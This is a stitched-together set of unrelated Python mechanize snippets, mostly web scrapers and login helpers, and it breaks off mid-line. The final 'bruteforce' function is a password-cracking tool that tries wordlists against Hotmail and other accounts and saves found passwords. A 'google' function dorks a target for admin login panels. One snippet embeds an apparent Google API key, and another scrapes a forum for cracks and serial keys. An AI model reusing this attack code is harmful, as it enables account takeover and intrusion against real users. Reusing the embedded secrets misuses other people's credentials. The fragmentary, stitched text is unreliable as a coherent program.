def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--total-jobs', metavar='<total-jobs>',
                        help='total number of jobs downloading documents', type=int)
    parser.add_argument('--job', metavar='<job>',
                        help='job number between 1 and <total-jobs>', type=int)
    args = parser.parse_args()
    check_args(parser, args)

    br = Browser()
    br.set_handle_robots(False)
    # br.set_debug_responses(True)

    data = urlencode({'user': USERNAME, 'pass': getpass()})

    document_urls = [LOGIN_PREFIX + url.strip() + '&view=etext'
                     for url in file(DOCUMENT_URLS_FILE)]

    start = args.job - 1
    step = args.total_jobs

    for url in iterview(document_urls[start::step]):
        try:
            get_document_pages(br, url, data)
        except Exception as e:
            print >> sys.stderr, '\n', (url, e)
def getScramArchByCMSSW(self):
    """
    Get from the list of available CMSSW releases
    return a dictionary of ScramArchitecture by CMSSW
    """
    # Set temporary connection to the server and get the response from cmstags
    url = 'https://cmssdt.cern.ch/SDT/cgi-bin/ReleasesXML'
    br = Browser()
    br.set_handle_robots(False)
    response = br.open(url)
    soup = BeautifulSoup(response.read())

    # Dictionary form
    # {'CMSSW_X_X_X': ['slc5_amd64_gcc472'], ...}
    archByCmssw = {}

    # Fill the dictionary
    for arch in soup.find_all('architecture'):
        for cmssw in arch.find_all('project'):
            # CMSSW release
            cmsswLabel = cmssw.get('label').encode('ascii', 'ignore')
            if cmsswLabel not in archByCmssw:
                archByCmssw[cmsswLabel] = []
            # ScramArch related to this CMSSW release
            archName = arch.get('name').encode('ascii', 'ignore')
            archByCmssw[cmsswLabel].append(archName)

    return archByCmssw
class GetPIN():

    def __init__(self, url, username, password):
        self.br = Browser()
        self.br.set_handle_equiv(False)
        self.br.set_handle_robots(False)
        self.url = url
        self.username = username
        self.password = password

    def getPIN(self):
        self.br.open(self.url)
        try:
            self.br.select_form(name="authZForm")
            self.br['userId'] = self.username
            self.br['passwd'] = self.password
            response = self.br.submit()
            data = response.readlines()
        except:
            data = self.br.response().readlines()
        pattern = r'<span class="fb">(.*?)</span>'
        pat = re.compile(pattern)
        for line in data:
            if pat.search(line):
                verifier = pat.findall(line)
                break
        if len(verifier):
            return verifier[0]
        else:
            return -1
def __init__(self):
    Browser.__init__(self)
    self.set_handle_robots(False)
    self.addheaders = [(
        'Accept',
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    )]
def on_task_start(self, task, config): try: from mechanize import Browser except ImportError: raise PluginError('mechanize required (python module), please install it.', log) userfield = config.get('userfield', 'username') passfield = config.get('passfield', 'password') url = config['url'] username = config['username'] password = config['password'] br = Browser() br.set_handle_robots(False) try: br.open(url) except Exception as e: # TODO: improve error handling raise PluginError('Unable to post login form', log) #br.set_debug_redirects(True) #br.set_debug_responses(True) #br.set_debug_http(True) for form in br.forms(): loginform = form try: loginform[userfield] = username loginform[passfield] = password break except Exception as e: pass else: received = os.path.join(task.manager.config_base, 'received') if not os.path.isdir(received): os.mkdir(received) filename = os.path.join(received, '%s.formlogin.html' % task.name) with open(filename, 'w') as f: f.write(br.response().get_data()) log.critical('I have saved the login page content to %s for you to view' % filename) raise PluginError('Unable to find login fields', log) br.form = loginform br.submit() cookiejar = br._ua_handlers["_cookies"].cookiejar # Add cookiejar to our requests session task.requests.add_cookiejar(cookiejar) # Add handler to urllib2 default opener for backwards compatibility handler = urllib2.HTTPCookieProcessor(cookiejar) if urllib2._opener: log.debug('Adding HTTPCookieProcessor to default opener') urllib2._opener.add_handler(handler) else: log.debug('Creating new opener and installing it') urllib2.install_opener(urllib2.build_opener(handler))
def url_handler(data, lock):
    tweet = json.loads(data)
    if tweet['entities']['urls']:
        for index in range(len(tweet['entities']['urls'])):
            url = tweet['entities']['urls'][index]['expanded_url']
            try:
                tweet['entities']['urls'][index]['url_title'] = "-"
                br = Browser()
                br.open(url)
                title = br.title()
                if title == None:
                    title = "-"
                tweet['entities']['urls'][index]['url_title'] = title.encode('ascii', 'ignore')
            except (BrowserStateError, ParseError, UnicodeDecodeError, URLError):
                pass
    else:
        tweet

    lock.acquire()
    try:
        try:
            global count
            f = open('json/tweets-' + str(count) + '.json', 'a')
            if f.tell() >= 9900000:
                f.close()
                count += 1
                f = open('json/tweets-' + str(count) + '.json', 'a')
            f.write(json.dumps(tweet) + "\n")
            f.close()
        except UnicodeDecodeError, e:
            pass
    finally:
        lock.release()
def down_image(self, img):
    print "down image from " + img
    down_br = Browser()
    down_cj = CookieJar()
    down_br.set_cookiejar(down_cj)
    fn = tempfile.mktemp(suffix='.png')
    return down_br.retrieve(img, filename=fn)[0]
def respond(bot, event):
    matches = []

    for (ident, (regex, template)) in bot.commands_cache.iteritems():
        match = regex.search(event.message)
        if match:
            params = match.groupdict()
            params['nick'] = event.source
            heappush(
                matches,
                (match.start(0), template.safe_substitute(params))
            )

    if not matches:
        if event.message.find("http") != -1:
            br = Browser()
            try:
                br.set_handle_robots(False)
                br.open(event.message)
                bot.send_channel_action(bot.config.messages.urltitle,
                                        title=format.bold('\"' + br.title() + '\"'))
            except:
                return False
            return True
        else:
            return False

    bot.send_channel_action(matches[0][1])
    return True
def GetXboxLiveFriends(self):
    """Return a list of tuples (gamer_tag, gamer_presence)."""
    br = Browser()
    br.open('http://live.xbox.com/en-US/profile/Friends.aspx')
    br.select_form(name='f1')
    br['login'] = self.login
    br['passwd'] = self.passwd
    br.submit()  # Submit login form.
    br.select_form(name='fmHF')
    response = br.submit()  # Submit redirect form.
    friend_list = response.read()
    response.close()

    soup = BeautifulSoup(friend_list)
    friend_table = soup.find('table', {'class': FRIEND_TABLE_CLASS})
    if friend_table is None:
        raise XboxLiveError('Parsing failure.')

    friends = []
    for row in friend_table.contents[1:]:  # Skip header row.
        gamer_tag = row.find('td', {'class': GAMER_TAG_CLASS})
        gamer_tag = str(gamer_tag.find('a').contents[0])
        gamer_presence = row.find('td', {'class': GAMER_PRESENCE_CLASS})
        gamer_presence = str(gamer_presence.find('h4').contents[0])
        friends.append((gamer_tag, gamer_presence))
    return friends
def KILLMODE(): global FIRE, cdown if (FIRE): cdown = cdown + 1 global urlList, urlBList, Stats, stats # generate random ytube link x = ''.join([random.choice(string.ascii_letters + string.digits + "_-") for n in xrange(11)]) while x in urlList or x in urlBList: print "Generated Duplicate Link; Re-generating" x = ''.join([random.choice(string.ascii_letters + string.digits + "_-") for n in xrange(11)]) br = Browser() try: res = br.open("http://www.youtube.com/watch?v=" + x) data = res.get_data() soup = BeautifulSoup(data) title = soup.find('title') # bad links are titled 'Youtube' if title.renderContents() != "YouTube": urlList.append("http://www.youtube.com/watch?v=" + x) # good links have other titles else: urlBList.append("http://www.youtube.com/watch?v="+ x) except HTTPError, e: print "Error ", e.code print "ERROR at:: http://www.youtube.com/watch?v=" + x Stats.set("TRIES THIS ATTEMPT: " + str(cdown) + "\nSUCCESS: " + str(len(urlList)) + "\nFAIL: " + str(len(urlBList)))
def login_to_kaggle(self):
    """Login to Kaggle website

    Parameters:
    -----------
    None

    Returns:
    browser: Browser
        a mechanize Browser object to be used for further access to site
    """
    if self.verbose:
        print("Logging in to Kaggle..."),

    br = Browser()
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)

    br.open(self.kag_login_url)
    br.select_form(nr=0)
    br['UserName'] = self.kag_username
    br['Password'] = self.kag_password
    br.submit(nr=0)

    if br.title() == "Login | Kaggle":
        raise KaggleError("Unable to login Kaggle with username %s (response title: %s)"
                          % (self.kag_username, br.title()))

    if self.verbose:
        print("done!")

    return br
def google(query): print("\n\t[!] Searching on Google...\n") print("[QUERY] >> " + query) try: query = query.replace(" ", "+") req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query br = Browser() br.set_handle_robots(False) br.addheaders = [("User-agent", "chrome")] html = br.open(req).read() soup = BeautifulSoup(html, "html5lib") with open("./output/google-%s.txt" % query[8:], "w") as log: for results in soup.findAll(attrs={"class": "g"}): for title in results.findAll("h3", attrs={"class": "r"}): t = title.text t = t.title() for link in results.findAll(attrs={"class": "s"}): l = link.cite.text print(t) print(l + '\n') log.write(str(l) + '\n') except Exception as e: print(e)
def fetch_laws_page_from_year(year, temporaryDirectory):
    lawsDirectory = os.path.join(temporaryDirectory, 'all_laws')
    if not os.path.exists(lawsDirectory):
        os.makedirs(lawsDirectory)
        print('The laws directory did not exist so I created it')
        print(lawsDirectory)

    fileToWriteLawsListIn = os.path.join(lawsDirectory, year + '.html')
    print('File to write in is ' + fileToWriteLawsListIn)

    lawWasNotDownloaded = not os.path.isfile(fileToWriteLawsListIn)
    if lawWasNotDownloaded:
        startDownload = int(round(time.time() * 1000))
        print('Getting laws from year ' + year)
        url = get_ugly_url_for_laws(year)
        browser = Browser()
        browser.open(url)
        html = browser.response().get_data()
        with open(fileToWriteLawsListIn, 'a') as f:
            f.write(html)
        endDownload = int(round(time.time() * 1000))
        print('Finished downloading laws for year ' + year + '. It took only '
              + str(endDownload - startDownload) + ' milliseconds')
    else:
        print('This year was already fetched ' + year + '. Skipping to the next year')
def __init__(self, request, username, password, context=''):
    """
    When the class is instantiated, it logs in using the provided username and
    password. If browser_login holds anything, it is the set of cookies saved
    from the last logged-in session: we reload those cookies into a new
    Browser, saving the seconds a fresh login would take.
    """
    self.context = context
    self.request = request
    registry = self.request.registry
    self.epitool = registry.getUtility(IEPIUtility)

    self.username = username
    self.password = password
    self.browser_login, elk = self.epitool.recoverBrowserSession(
        self.request, self.username, 'presencia')

    if self.browser_login:
        self.br = Browser()
        self.br.set_handle_robots(False)
        cj = LWPCookieJar()
        self.br.set_cookiejar(cj)
        for co in self.browser_login:
            ck = Cookie(version=co['version'], name=co['name'], value=co['value'],
                        port=co['port'], port_specified=co['port_specified'],
                        domain=co['domain'], domain_specified=co['domain_specified'],
                        domain_initial_dot=co['domain_initial_dot'], path=co['path'],
                        path_specified=co['path_specified'], secure=co['secure'],
                        expires=co['expires'], discard=co['discard'],
                        comment=co['comment'], comment_url=co['comment_url'],
                        rest=co['rest'])
            cj.set_cookie(ck)
        print "Logging-in into presencia via browser"
    else:
        self.br = Browser()
        self.br.set_handle_equiv(False)
        self.login(message=u"Logging-in into presencia via regular login")
    return
def newBrowser(self):
    # Create new browsers all the time because its data structures grow
    # unboundedly (texas#135)
    br = Browser()
    br.add_password(self.hostname, self.username, self.password)
    br.set_handle_robots(None)
    return br
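# Usage sketch (illustrative, not part of the original snippet): a hypothetical
# caller that grabs a fresh Browser per request, so each instance -- and the
# history it accumulates -- is discarded as soon as the page has been read.
def fetch_page(self, url):
    br = self.newBrowser()
    try:
        return br.open(url).read()
    finally:
        br.close()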
def num_itens(self, busca, data_inicial, data_final):
    try:
        br = Browser()
        self.endereco = 'http://www.imprensaoficial.com.br/PortalIO/DO/BuscaDO2001Resultado_11_3.aspx?f=xhitlist&xhitlist_sel=title%3bField%3adc%3atamanho%3bField%3adc%3adatapubl%3bField%3adc%3acaderno%3bitem-bookmark%3bhit-context&xhitlist_vpc=first&xhitlist_s=&xhitlist_q=('\
            + busca + \
            ')&filtrotodoscadernos=True&xhitlist_xsl=xhitlist.xsl&filtrocadernossalvar=todos%2cexeci%2cjucii%2casb%2cexecii%2cjudciii%2cjc%2ctrt2r%2cjudel%2cjudipi%2cjudipii%2ctrt15r%2cemp%2csup%2cdouj%2cdom%2ctjm%2ctre%2ctrt2aa%2cjfd%2coab&xhitlist_mh=9999&filtropalavraschave='\
            + busca
        response1 = br.open(self.endereco)
        texto = response1.read()
        x1, x2, x3 = texto.partition('<span id="lblDocumentosEncontrados" class="tx_red">')
        x3, x2, x1 = x3.partition("</span></td>")
        x3 = x3.replace(",", "")
        x3 = x3.strip()
        # Returns the number of items found
        if x3 == "Um":
            return 1
    except:
        print("Error in the address!")
        print(self.endereco)
        x3 = "0"
    if len(x3) > 0:
        return int(x3)
    else:
        return 0
def submit(self, timestamp, username, password, t_id, t_short, files, language): """Execute the request for a submission. timestamp (int): seconds from the start. username (string): username issuing the submission. password (string): password of username. t_id (string): id of the task. t_short (string): short name of the task. files ([dict]): list of dictionaries with keys 'filename' and 'digest'. language (string): the extension the files should have. """ logger.info("%s - Submitting for %s on task %s." % (to_time(timestamp), username, t_short)) if len(files) != 1: logger.error("We cannot submit more than one file.") return # Copying submission files into a temporary directory with the # correct name. Otherwise, SubmissionRequest does not know how # to interpret the file (and which language are they in). temp_dir = tempfile.mkdtemp(dir=config.temp_dir) for file_ in files: temp_filename = os.path.join(temp_dir, file_["filename"].replace("%l", language)) shutil.copy(os.path.join(self.import_source, "files", files[0]["digest"]), temp_filename) file_["filename"] = temp_filename filename = os.path.join(files[0]["filename"]) browser = Browser() browser.set_handle_robots(False) step(LoginRequest(browser, username, password, base_url=self.cws_address)) step(SubmitRequest(browser, (int(t_id), t_short), filename=filename, base_url=self.cws_address)) shutil.rmtree(temp_dir)
class Du8Doc:
    def __init__(self):
        self.br = Browser()

    def from_html(self, html):
        text = re.sub("<.+>\n", "", html)
        text = re.sub("</.+>\n", "", text)
        text = re.sub('(<br/?>\s*)+', '\n', text)
        text = re.sub(' ', ' ', text)
        return text

    def get_links(self, url):
        res = self.br.open(url)
        data = res.get_data()
        soup = BeautifulSoup(data, "html5lib")
        div_content = soup.find('table')
        urls = div_content.find_all("a")
        return [url.get('href') for url in urls]

    def get_content(self, link):
        res = self.br.open(link)
        data = res.get_data()
        soup = BeautifulSoup(data, "html5lib")
        title, chapter = soup.html.title.string.split("-")[0:2]
        div_content = soup.find(id="content").prettify()
        content = self.from_html(div_content)
        return title, chapter, content
def google(self): print("\n\t[!] Searching on Google...\n") if self.dork == None: query = "site:" + self.target.replace("http://", "").replace("https://", "") + " inurl:(login||adm||admin||admin/account||controlpanel||adminitem||adminitems||administrator||administration||admin_area||manager||letmein||superuser||access||sysadm||superman||supervisor||control||member||members||user||cp||uvpanel||manage||management||signin||log-in||log_in||sign_in||sign-in||users||account)" else: query = "".join(self.dork) query = query.strip("'") print("[DORK] >> " + query) try: query = query.replace(" ", "+") req = "https://www.google.com.br/search?q=%s&num=50&start=0" % query br = Browser() br.set_handle_robots(False) br.addheaders = [("User-agent", "chrome")] html = br.open(req).read() soup = BeautifulSoup(html, "html5lib") with open("./output/google-%s.txt" % self.target[8:], "w") as log: for results in soup.findAll(attrs={"class":"g"}): for title in results.findAll("h3", attrs={"class":"r"}): t = title.text t = t.title() for link in results.findAll(attrs={"class":"s"}): l = link.cite.text print (t) print (l + '\n') log.write(str(l) + '\n') except Exception as e: print(e)
def name(request, string): movie = string.replace("_", "+") br = Browser() br.open("http://www.imdb.com/find?s=tt&q="+movie) link = br.find_link(url_regex=re.compile(r"/title/tt.*")) data = br.follow_link(link) soup = BeautifulSoup(data.read()) title = soup.find('h1').contents[0].strip() name = title.replace(" ", "") rating = soup.find('span', itemprop='ratingValue').contents[0] duration = soup.find('time', itemprop='duration').contents[0].strip() releaseDate = soup.find('a', title='See more release dates').contents[0] director = soup.find('span', itemprop='director').getText() actor_all = [] actors = soup.findAll('span', itemprop='actors') for i in range(len(actors)): actor_all.append((actors[i].contents[1]).getText()) genres_all = [] genres = soup.findAll('span', itemprop='genre') for i in range(len(genres)): genres_all.append(genres[i].getText()) jsonObject = {} jsonObject['Name:'] = name jsonObject['IMDB Rating:'] = rating jsonObject['Duration'] = duration jsonObject["Actors: "] = actor_all jsonObject['Director:'] = director jsonObject['Genres'] = genres_all jsonObject['Release Date'] = releaseDate movie_details = json.dumps(jsonObject) return HttpResponse(movie_details)
def parseFeeds(self): mech = Browser() mech.addheaders = [ ('User-agent', 'Mozilla/5.0 (compatible)') ] mech.set_handle_robots(False) for url in self.feedUrls: #url = "http://feeds.feedburner.com/PurdueEngNews?format=xml" page = mech.open(url) html = page.read() soup = BeautifulStoneSoup(html) headlines = [] descriptions = [] i=0 self.newsList = [] for item in soup.findAll('item'): if (i > 20): break date = item.find('pubdate') title = item.find('title') link = item.find('link') desc = item.find('description') if (len(title.contents) > 0): title2 = title.contents[0] else: title2 = 'None' self.newsList.append(NewsStory(date.contents[0], title2, link.contents[0], \ desc.contents[0])) i+=1 for story in self.newsList: headlines.append(story.title) descriptions.append(story.link) #story.display() self.headlineList.append(headlines) self.descList.append(descriptions) self.populateTopicList()
def getLastEntries(self, url, lastDate): """ get all entries from an HTML table list if it is newer than prevEntry. Format is from graz FF site """ mech = Browser() mech.set_handle_robots(False) try: page = mech.open(url) except urllib2.HTTPError: if url == None: url = "(empty url)" self.logger.error("Could not read url "+url) return [] html = page.read() soup = BeautifulSoup(html) link = soup.findAll('a') if len(link) == 0: logger.error('No links in the page: %s', url) return [] returnLinks = [] for l in link: try: date = datetime.strptime(l.string, "topo-%Y-%m-%d-%H:%M.tsv.gz") except ValueError: continue if date > lastDate: returnLinks.append(url+l.string) else: break return returnLinks
def mrsc(gid): mech = Browser() url = "http://espn.go.com/ncf/playbyplay?gameId="+gid+"&period=0" #print url page = mech.open(url) html = page.read() print url if html.count('Play-by-play not currently available.') == 0: soup = BeautifulSoup(html) table = soup.findAll("table")[-1] rows = table.findAll('tr')[::-1] c=0 toret='' keepgoing=True cup=html[::-1][:html[::-1].find(' left; font: 700 14px/25px Helvetica,Arial,sans-serif;" colspan="3"><div style="margin-right: 6px;"'[::-1])][::-1] cup=cup[cup.find('a name="')+len('a name="'):] cup=cup[:cup.find('"')] while c < 7 and keepgoing and c < len(rows): cols = rows[c].findAll('td') #print rows[c] if len(cols) > 2: #if str(cols[2]) != '<td> </td>' and str(cols[3]) != '<td> </td>': toret=str(' '.join(cols[0].findAll(text=True)))+'. '+str(' '.join(cols[1].findAll(text=True))) keepgoing=False c=c+1 toret=toret.replace(' ',' ').strip() if toret != '': toret=toret+' ' poss='' if cup != '' and len(cup) < 30: poss=cup else: toret='' poss='' return [toret,poss]
def num_itens(self, busca, data_inicial, data_final):
    br = Browser()
    response1 = \
        br.open("http://portal.in.gov.br/in/imprensa1/pesquisa_avancada")
    br.select_form(name="formBusca")
    br["texto_todas"] = busca
    br["dataPublicacaoInicial"] = data_inicial[:5]
    br["dataPublicacaoFinal"] = data_final[:5]
    br["ano"] = [data_final[-4:]]
    br["idJornal"] = ["1", "2", "3", "4"]
    # print(br.form)
    br.form.action = \
        "http://www.in.gov.br/imprensa/pesquisa/pesquisaresultado.jsp"
    res = br.submit()
    texto = res.read()
    x1, x2, x3 = texto.partition("ite")
    x1, x2, x3 = x1.rpartition(">")
    try:
        arq = open(self.retornar_html(), "w")
        arq.write(texto)
        arq.close()
    except:
        print("Error while trying to save the search results page!")
    x3 = x3.replace(",", "")
    x3 = x3.strip()
    # Returns the number of items found
    if x3 == "Um":
        return 1
    if len(x3) > 0:
        return int(x3)
    else:
        return 0
def scrap_query(query, bang=None):
    r = ddg_query('imbd ' + query, bang=bang)

    if 'redirect' in dir(r) and 'primary' in dir(r.redirect):
        url = r.redirect.primary
    else:
        logger.info('Could not find imdb searchpage from DuckDuckGo bang')
        return None

    br = Browser()
    br.set_handle_robots(False)
    br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.2;\
        WOW64) AppleWebKit/537.11 (KHTML, like Gecko)\
        Chrome/23.0.1271.97 Safari/537.11')]

    r = br.open(url)
    soup = BeautifulSoup(r)
    for link in soup.find_all('a'):
        href = link.get('href', '')
        match = re.search(r"imdb\.com/.*tt(?P<number>[^/]*)", href)
        if match:
            imdb_id = check_imdb(match.group('number'))
            return imdb_id
    return None
def gen_path(request): x = json.loads(request.POST['data']) #fetches data print x adj_mat = [] #creates empty adjacency matrix i1 = j1 = 0 num_cities = len(x) for i in x: tmp_mat = [] for j in x: if i!=j: API_KEY = "AIzaSyDBOSr6_XxvISPGX54P9bPnooE3RUpRTp0" orig_coord = x[i] dest_coord = x[j] br = Browser() #creates mechanize instance br.set_handle_robots(False) # print "https://maps.googleapis.com/maps/api/distancematrix/json?origins={0}&destinations={1}&key={2}".format(orig_coord, dest_coord, API_KEY) result = br.open("https://maps.googleapis.com/maps/api/distancematrix/json?origins={0}&destinations={1}&key={2}".format(orig_coord, dest_coord, API_KEY)).read() #makes a call to GoogleMapsAPI json_result = json.loads(result) tmp_mat.append(int(json_result['rows'][0]['elements'][0]['distance']['value'])) else: tmp_mat.append(0) adj_mat.append(tmp_mat) obj = ArpanDaErCode() ans = "" ans = ArpanDaErCode.solve(obj, adj_mat, num_cities) #gets sequence from model print ans ret = {'data': [str(ii) for ii in ans]} return HttpResponse(str(json.dumps(ret))) #returns the sequens in JSON format for the JS to handle
def __init__(self,options): (self.configfile,self.config,self.moduleconfig) = self.initialize_config(options) # If we have a particular log level for this module, use that, # otherwise use the global log level. If that isn't defined # either, use the INFO loglevel. if 'log' in self.moduleconfig: loglevel = self.moduleconfig['log'] else: loglevel = self.config.get('log','INFO') self.log = self.setup_logger(self.module_dir,loglevel) self.base_dir = self.config['datadir'] if self.browser_use_robustfactory: self.browser = Browser(factory=RobustFactory()) else: self.browser = Browser() self.browser.addheaders = [('User-agent', 'lagen.nu-bot ([email protected])')] # logger = logging.getLogger("mechanize") # logger.addHandler(logging.StreamHandler(sys.stdout)) # logger.setLevel(logging.DEBUG) # self.browser.set_debug_http(True) # self.browser.set_debug_responses(True) # self.browser.set_debug_redirects(True) self.ns = {'rinfo': Namespace(Util.ns['rinfo']), 'rinfoex':Namespace(Util.ns['rinfoex']), 'dct': Namespace(Util.ns['dct'])}
def lookup_offers_isbn(item_id): offers = [] br = Browser() res = br.open("http://books.half.ebay.com/ws/web/HalfISBNSearch?isbn=%s" % item_id) soup = BeautifulSoup(res.read()) ratings = soup.findAll('span',{'class': 'Header'}) for r in ratings: rating = r.text prices= r.parent.parent.parent.findNextSibling('table').findAll('tr')[1:] linktext = r.parent.parent.parent.findNextSiblings('table')[1].find(text=re.compile('View all.*')) if linktext: all = linktext.parent['href'] # get link res2 = br.open(all) soup = BeautifulSoup(res2.read()) rating2 = soup.findAll('span',{'class': 'Header'}) prices = rating2[0].parent.parent.parent.parent.findAll('table')[3].findAll('tr')[1:] for row in prices: m = re.search("itemid=(\d+)",row.find('a',href=re.compile("itemid=\d+"))['href']) itemid=m.group(1) seller = row.find('a',{'class':'SellerDisplayLink'}).text price = row.find('span',{'class':'ItemPrice'}).text price = string.replace(price,",","") if price.startswith("$"): price = price[1:] offers.append({ 'rating' : rating, 'seller' : seller, 'listing_id' : itemid, 'price' : str(price) }) print rating,seller,itemid,price return offers
def respond(permalink, text): br = Browser() user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1' br.addheaders = [('User-agent', user_agent)] soup = BeautifulSoup(br.open(permalink).read()) urlopen = urllib2.urlopen Request = urllib2.Request encode = urllib.urlencode cj = cookielib.LWPCookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) root_comment = soup.find('form', attrs={'class': 'usertext border'}) thing_id = root_comment.find('input', attrs={'name': 'thing_id'})['value'] print 'thing_id', thing_id # LOG THE F**K IN req = Request('http://www.reddit.com/api/login/username', encode({'user': '******', 'passwd': 'hackny', 'api_type': 'json'}), {'User-Agent': user_agent}) req_open = urlopen(req) read = json.loads(req_open.read()) modhash = read['json']['data']['modhash'] # POST THE F*****G COMMENT req = Request('http://www.reddit.com/api/comment', encode({'thing_id': thing_id, 'text': text + '\n\n*This is an automated response.*', 'uh': modhash}), {'User-Agent': user_agent}) req_open = urlopen(req) read = json.dumps(req_open.read())
def login_url(url, login, passwd, form_nomber, login_name, paswd_name, submit_nomber):
    br = Browser()
    showMessage('Creating the browser interface')
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)
    br.addheaders = [('User-agent',
                      'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

    br.open(url)
    showMessage('Loading the site and logging in')
    br.select_form(nr=form_nomber)
    br[login_name] = login
    br[paswd_name] = passwd
    res = br.submit(nr=submit_nomber)
    content = res.read()

    # determine the number of pages
    maxPage = int(max_page(content))
    showMessage('Determining the number of pages and jumping to the last one')
    curPage = 84
    while curPage < maxPage:
        res = br.open('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage))
        curPage = maxPage
        maxPage = int(max_page(content))
        content = res.read()

    # parse the keys
    if get_all_keys(content):
        # Returns True and opens a tab
        webbrowser.open_new_tab('http://forum.rsload.net/cat-kryaki-seriyniki-varez/topic-4820-page-%d.html' % (maxPage))
def set_debug_redirect(self, *args, **kwargs):
    B.set_debug_redirect(self, *args, **kwargs)
    self._clone_actions['set_debug_redirect'] = ('set_debug_redirect', args, kwargs)

def set_handle_equiv(self, *args, **kwargs):
    B.set_handle_equiv(self, *args, **kwargs)
    self._clone_actions['set_handle_equiv'] = ('set_handle_equiv', args, kwargs)

def set_handle_refresh(self, *args, **kwargs):
    B.set_handle_refresh(self, *args, **kwargs)
    self._clone_actions['set_handle_refresh'] = ('set_handle_refresh', args, kwargs)

def set_handle_gzip(self, handle):
    B._set_handler(self, '_gzip', handle)
    self._clone_actions['set_handle_gzip'] = ('set_handle_gzip', (handle,), {})
class BetFair(): def __init__(self, url, filename, sample_time, n_attempts=2): self.filename = filename self.sample_time = sample_time self.n_attempts = n_attempts sleep_time = 5 self.url = url self.br = Browser() while (True): attempt = 0 for attempt in range(n_attempts): try: self._load_page() self.write_games_odds() break except: print('Erro!') time.sleep(sleep_time) time.sleep(self.sample_time - attempt * sleep_time) def _load_page(self): self.time = datetime.now().strftime('%Y-%m-%d %H:%M:%S') page_content = self.br.open(self.url).read() page = BeautifulSoup(page_content, "lxml") page = page.find_all('div', class_='content-multipick') self.page = page[0].find_all('div', class_='details-market market-3-runners') def _get_games_odds(self, pg): #TODO: tirar a porra desse slice start = str(pg.find_all('a')[0]).find('data-galabel') end = str(pg.find_all('a')[0]).find('data-loader') teams = str(pg.find_all('a')[0])[start + 14:end - 11].split(' x ') team1 = teams[0] team2 = teams[1] x1 = str(pg.find_all('a')[1].find().get_text().replace('\n', '')) x2 = str(pg.find_all('a')[2].find().get_text().replace('\n', '')) x3 = str(pg.find_all('a')[3].find().get_text().replace('\n', '')) return [team1, team2, x1, x2, x3] def write_games_odds(self): for pg in self.page: self._write_file(self._get_games_odds(pg)) def _write_file(self, line): try: with open(self.filename, "a") as f: f.write('\n' + self.time) for x in line: f.write(';' + x) except: print('Criando arquivo: ' + self.filename) with open(self.filename, "w") as f: f.write('\n' + self.time) for x in line: f.write(';' + x)
def set_cookiejar(self, *args, **kwargs):
    B.set_cookiejar(self, *args, **kwargs)
    self._clone_actions['set_cookiejar'] = ('set_cookiejar', args, kwargs)
def bruteforce(self): progress = Progressbar(self, orient=HORIZONTAL, length=200, mode='determinate') progress.place(x=600, y=200) use = OptionParser() use.add_option("-g", "--gmail", dest="gmail", help="Write Your Account gmail") use.add_option("-t", "--hotmail", dest="hotmail", help="Write Your Account hotmail") use.add_option("-T", "--twitter", dest="twitter", help="Write Your Account twitter") use.add_option("-f", "--facebook", dest="facebook", help="Write Your Account facebook") use.add_option("-n", "--netflix", dest="netflix", help="Write Your Account Netflix") use.add_option("-l", "--list", dest="list_password", help="Write Your list passowrd") use.add_option("-p", "--password", dest="password", help="Write Your passowrd ") use.add_option("-X", "--proxy", dest="proxy", help="Proxy list ") (options, args) = use.parse_args() brows = Browser() brows.set_handle_robots(False) brows._factory.is_html = True brows.set_cookiejar(cookielib.LWPCookieJar()) useragents = [ 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)', 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6' ] brows.addheaders = [('User-agent', random.choice(useragents))] brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) proxyList = options.proxy if options.gmail == None: if options.hotmail == None: if options.twitter == None: if facebook == None: if options.netflix == None: print(use.usage) exit() elif options.hotmail != None or options.gmail == None: smtp_srverH = smtplib.SMTP('smtp.live.com', 587) smtp_srverH.ehlo() smtp_srverH.starttls() if options.password != None or options.list_password == None: print("<<<<<<+++++Start Attacking Email+++++>>>>>") try: smtp_srverH.login(options.hotmail, options.password) print("Found Password :{} \t Found Hotmail:{}".format( options.password, options.hotmail)) Save = io.open( "Hotmail.txt", "a").write("Account Hotmail:" + options.hotmail + "\t\tPassword:"******"\n") except: print("Not Found Password : {} \t Email Hotmail:{}".format( options.password, options.hotmail)) elif options.list_password != None or options.password == None: password_list = io.open(options.list_password, "r").readlines() for password in password_list: try: print("<<<<<<+++++Start Attacking Email+++++>>>>>") smtp_srverH.login(options.hotmail, password) print("FOUND Password :{} \n Found Hotmail:{}".format( password, options.hotmail)) Save = io.open( "Hotmail.txt", "a").write("Account Hotmail:" + options.hotmail + "\t\tPassword:"******"\n") except smtplib.SMTPAuthenticationError: print("Not Found Password : {} \t Email Hotmail:{}". 
